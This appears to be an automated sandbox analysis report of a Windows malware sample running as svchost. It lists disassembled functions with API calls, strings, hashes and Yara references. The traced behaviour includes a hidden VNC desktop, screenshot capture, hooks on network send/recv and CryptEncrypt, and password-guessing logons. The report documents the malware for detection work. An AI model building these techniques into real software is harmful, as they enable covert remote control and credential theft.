                                                                                                                                                                                                                • Part of subcall function 0264DA20: CreateMutexA.KERNEL32(00000000,00000000,0268F670), ref: 0264DAE1
                                                                                                                                                                                                                • Part of subcall function 0264DA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0264DAFF
                                                                                                                                                                                                                • Part of subcall function 0264DA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 0264DB20
                                                                                                                                                                                                                • Part of subcall function 0264DA20: SetNamedSecurityInfoA.ADVAPI32(0268F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0264DB3D
                                                                                                                                                                                                                • Part of subcall function 0264DA20: LocalFree.KERNEL32(00000000), ref: 0264DB47
                                                                                                                                                                                                                • Part of subcall function 0264DC50: memset.MSVCRT ref: 0264DC69
                                                                                                                                                                                                                • Part of subcall function 0264DC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 0264DC82
                                                                                                                                                                                                                • Part of subcall function 02669F50: malloc.MSVCRT ref: 02669F62
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 026483E7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 026483F5
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,fuck), ref: 026483FF
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsNetworkAlive.SENSAPI(02646E0D,00000000), ref: 02654F93
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsUserAnAdmin.SHELL32 ref: 02654FA1
                                                                                                                                                                                                                • Part of subcall function 02654F80: DnsFlushResolverCache.DNSAPI ref: 02654FAB
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 02654FC8
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02654FE7
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02655000
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655013
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 0265502C
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02655045
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02655058
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655065
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 026484A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 026484B1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 026484E0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 026484EF
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026484FD
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02648506
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,00000000), ref: 0264854C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                              • String ID: SYSTEM!141700!EEA00FA4$fuck
                                                                                                                                                                                                              • API String ID: 379441473-1306868477
                                                                                                                                                                                                              • Opcode ID: ae1e790174e37b317396d69dfbe26deacb3cabda325758e9fc4fa207800f9551
                                                                                                                                                                                                              • Instruction ID: 09d92ebfbec1cc466dece0ae9de2eef6b242af5f5fbfc60f90a9bce71ed78cea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e790174e37b317396d69dfbe26deacb3cabda325758e9fc4fa207800f9551
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC51F271981300AFD714DF64ED8CFAA3BE9BB44314F054AA9E9898B391CF75A890CF50
                                                                                                                                                                                                              Function 02663340 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269CF94), ref: 02663367
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026633A9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026633B5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026633B9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026633CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026633D1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663402
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02663408
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0266340C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266341D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663424
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02663452
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02663468
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                              • API String ID: 224938940-1670482240
                                                                                                                                                                                                              • Opcode ID: 3853a542947f120f43183b3dc6d55cac04e7b18151dd52f1ed884ca166a21e04
                                                                                                                                                                                                              • Instruction ID: 84c687f6546a37ce5bdad474ac92d23e8e327c9bb68dd0f96dd678b4ab21f935
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3853a542947f120f43183b3dc6d55cac04e7b18151dd52f1ed884ca166a21e04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B31D8319442586BDB20DB749C58BFEBBE8AF55700F895594E986E3300EFB0D9D4CBA0
                                                                                                                                                                                                              Function 026631C0 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 026631EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026631FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02663211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02663080,00000000,00000000,00000000), ref: 02663234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 02663245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0266324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0266325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02663277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A277,RFK), ref: 02663291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0266329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 505831200-3535460518
                                                                                                                                                                                                              • Opcode ID: b368dae00f67c814fe036654b9a0d84a0856388453a8568d12d8961387ce74d6
                                                                                                                                                                                                              • Instruction ID: c026eea4e1ffacdd8f7abd61c21cdbc61849b1916096f6a352f0ef4d8874297f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b368dae00f67c814fe036654b9a0d84a0856388453a8568d12d8961387ce74d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4411D330AC57527BF31067A08C9EF2E7B9C5F04F10F514644FA12653C09FA0A96186AB
                                                                                                                                                                                                              Function 0264A250 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 0264A25E
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindowLongA.USER32(0264CE3A,000000F0), ref: 0264E26B
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetLastActivePopup.USER32(0264CE3A), ref: 0264E279
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000,00000005), ref: 0264E293
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000), ref: 0264E296
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindowInfo.USER32(00000000,?), ref: 0264E2AC
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000,00000004), ref: 0264E2B5
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000,00000003), ref: 0264E2EE
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 0264A29F
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000000), ref: 0264A325
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 0264A34C
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 0264A391
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 0264A3E5
                                                                                                                                                                                                                • Part of subcall function 0264A100: GetTickCount.KERNEL32 ref: 0264A18A
                                                                                                                                                                                                                • Part of subcall function 0264A100: GetClassLongA.USER32(00000000,000000E6), ref: 0264A1DD
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000112,?,?), ref: 0264A44E
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 0264A479
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 0264A4F5
                                                                                                                                                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 0264A514
                                                                                                                                                                                                              • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 0264A538
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264A5A3
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0264A5B6
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000001,00000000), ref: 0264A5D9
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000002,00000000), ref: 0264A5FB
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0264A633
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264A65D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590198697-0
                                                                                                                                                                                                              • Opcode ID: f34a1e597d425b900ec6668b9301dd79c12f994bfaa3d470c593dbbd67295f76
                                                                                                                                                                                                              • Instruction ID: 892dfb60f8cf439488e954622365c2d2729c07114c14f9dca42f509276a142fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f34a1e597d425b900ec6668b9301dd79c12f994bfaa3d470c593dbbd67295f76
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ABB17A32FC021476EB309A98DCA8FBE3358DB85319F44412AFD85D7281DF698CA197A1
                                                                                                                                                                                                              Function 00401EA0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              Function 02649020 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132memorythreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 0264902F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02649037
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02649048
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 02649059
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02649070
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 026490B2
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 026490C2
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 026490C5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 026490CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02649129
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02649142
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0264915F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02649194
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 188880187-3887548279
                                                                                                                                                                                                              • Opcode ID: 6f033259bec1d721f27cf586f28672d1e7ebc773574568dc25b41df3b28d97f1
                                                                                                                                                                                                              • Instruction ID: 62ec80fc5b7b51355cc3f66183affa737ebdb2193e03df1dc677ad985ef8b087
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f033259bec1d721f27cf586f28672d1e7ebc773574568dc25b41df3b28d97f1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70416C71E81208AFDB10CFA8DC89BDE7BB8EB48710F545629E509E7380DB715850CBA1
                                                                                                                                                                                                              Function 02659820 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,76F8F550,76F8DF10,0265598B), ref: 02659831
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02659843
                                                                                                                                                                                                                • Part of subcall function 0265A540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A578
                                                                                                                                                                                                                • Part of subcall function 0265A540: memcpy.MSVCRT(?,?,00000000,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A5A0
                                                                                                                                                                                                                • Part of subcall function 0265A540: VirtualProtect.KERNEL32(00000000,?,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A635
                                                                                                                                                                                                                • Part of subcall function 0265A540: VirtualProtect.KERNEL32(?,00000000,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A64A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02659862
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,send), ref: 02659870
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSASend), ref: 0265988C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 026598A8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,recv), ref: 026598C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                              • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1216545827-2206184491
                                                                                                                                                                                                              • Opcode ID: 49b597e96cc74a3e59da2e8561513c946c8d39cb0a0de329233d03f370f8d657
                                                                                                                                                                                                              • Instruction ID: 8e0a77833a2f1e09e674ecbad7baea901224f3afd59108929f1344e1d2b28a24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49b597e96cc74a3e59da2e8561513c946c8d39cb0a0de329233d03f370f8d657
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01D772783332B0FA2036B64D06F2B378D1F55F48F150A25BD02B6640EA9DE91148F9
                                                                                                                                                                                                              Function 0266C8D0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                              • String ID: RFB 003.006
                                                                                                                                                                                                              • API String ID: 725816019-3790533501
                                                                                                                                                                                                              • Opcode ID: 7c3b7b7d4bcc110745480326afdc6a03088ce4ad0ea43cf39aaa8d8fe78d56c3
                                                                                                                                                                                                              • Instruction ID: 50fb9bfa41995819036920216f2500ddd35271a8f8cbf4269fc32cd40203a78a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c3b7b7d4bcc110745480326afdc6a03088ce4ad0ea43cf39aaa8d8fe78d56c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECC15EB0900640DFDB10CF29D888BA6BBE5FF88314F1586AADC49CF356D775A840CBA1
                                                                                                                                                                                                              Function 00401000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
